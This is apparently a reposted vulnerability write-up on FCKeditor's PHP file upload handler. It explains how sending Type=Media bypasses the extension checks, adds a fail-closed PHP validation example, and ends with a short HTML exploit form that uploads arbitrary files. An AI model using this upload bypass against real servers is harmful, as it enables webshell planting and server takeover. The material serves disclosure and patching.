Vulnerability Analysis:
Version 2.0-2.2:
FCKeditor/editor/filemanager/upload/php/upload.php

    $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;

    // Get the allowed and denied extensions arrays.
    $arAllowed = $Config['AllowedExtensions'][$sType] ;
    $arDenied  = $Config['DeniedExtensions'][$sType] ;

Here any type of file can be uploaded as long as it does not have the ".php" extension, for files, Flash, images, and text.
Version 2.3.0-2.4.3:
FCKeditor/editor/filemanager/upload/php/upload.php

    $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;

    // Check if it is an allowed type.
    if ( !in_array( $sType, array('File', 'Image', 'Flash', 'Media') ) )
        SendResults( 1, 'Invalid type specified' ) ;

    // Get the allowed and denied extensions arrays.
    $arAllowed = $Config['AllowedExtensions'][$sType] ;
    $arDenied  = $Config['DeniedExtensions'][$sType] ;

This code filters by Type, but in config.php the entries
$Config['AllowedExtensions']['Media'] and
$Config['DeniedExtensions']['Media'] do not exist.
When the Type sent is Media, you can upload any file.
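
The missing-key failure described above, seen from the defender's side as an added example (not FCKeditor's code or its actual fix): an extension check that fails closed when a Type has no lists configured. The function name is_upload_allowed and the sample extension lists are constructed for illustration; PHP 7.1 or later is assumed.

```php
<?php
// Added example, not FCKeditor code. The function name and the sample
// configuration values below are constructed for illustration.

// Mirrors the situation on this page: 'Media' is an accepted Type,
// but the configuration defines no extension lists for it.
$Config = [
    'AllowedExtensions' => [
        'File'  => ['txt', 'pdf', 'zip'],
        'Image' => ['jpg', 'gif', 'png'],
        'Flash' => ['swf'],
    ],
    'DeniedExtensions' => [
        'File'  => ['php', 'phtml', 'asp'],
        'Image' => [],
        'Flash' => [],
    ],
];

// Returns true only when the type has a non-empty allow list and the
// file's final extension is on it and not on the deny list.
function is_upload_allowed(array $config, string $type, string $fileName): bool
{
    $allowed = $config['AllowedExtensions'][$type] ?? null;
    $denied  = $config['DeniedExtensions'][$type] ?? null;

    // Fail closed: a type without both lists configured is rejected
    // instead of being treated as "no restrictions".
    if (!is_array($allowed) || !is_array($denied) || $allowed === []) {
        return false;
    }

    $ext = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
    if ($ext === '') {
        return false;
    }
    return in_array($ext, $allowed, true) && !in_array($ext, $denied, true);
}

$cases = [
    ['Image', 'photo.JPG'],  // configured type, allowed extension
    ['File',  'notes.php'],  // configured type, denied extension
    ['Media', 'clip.avi'],   // type with no lists in the configuration
    ['Nope',  'a.txt'],      // type that is not configured at all
];
foreach ($cases as [$type, $name]) {
    printf("%-6s %-10s %s\n", $type, $name,
        is_upload_allowed($Config, $type, $name) ? 'accept' : 'reject');
}
```
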
Exploit:
<form enctype="multipart/form-data" action="http://localhost/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
<input name="NewFile" type="file">
<input type="submit" value="submit">
</form>
www.2cto.com:
The problem is clear. Exp is also Type=Media. Just modify it.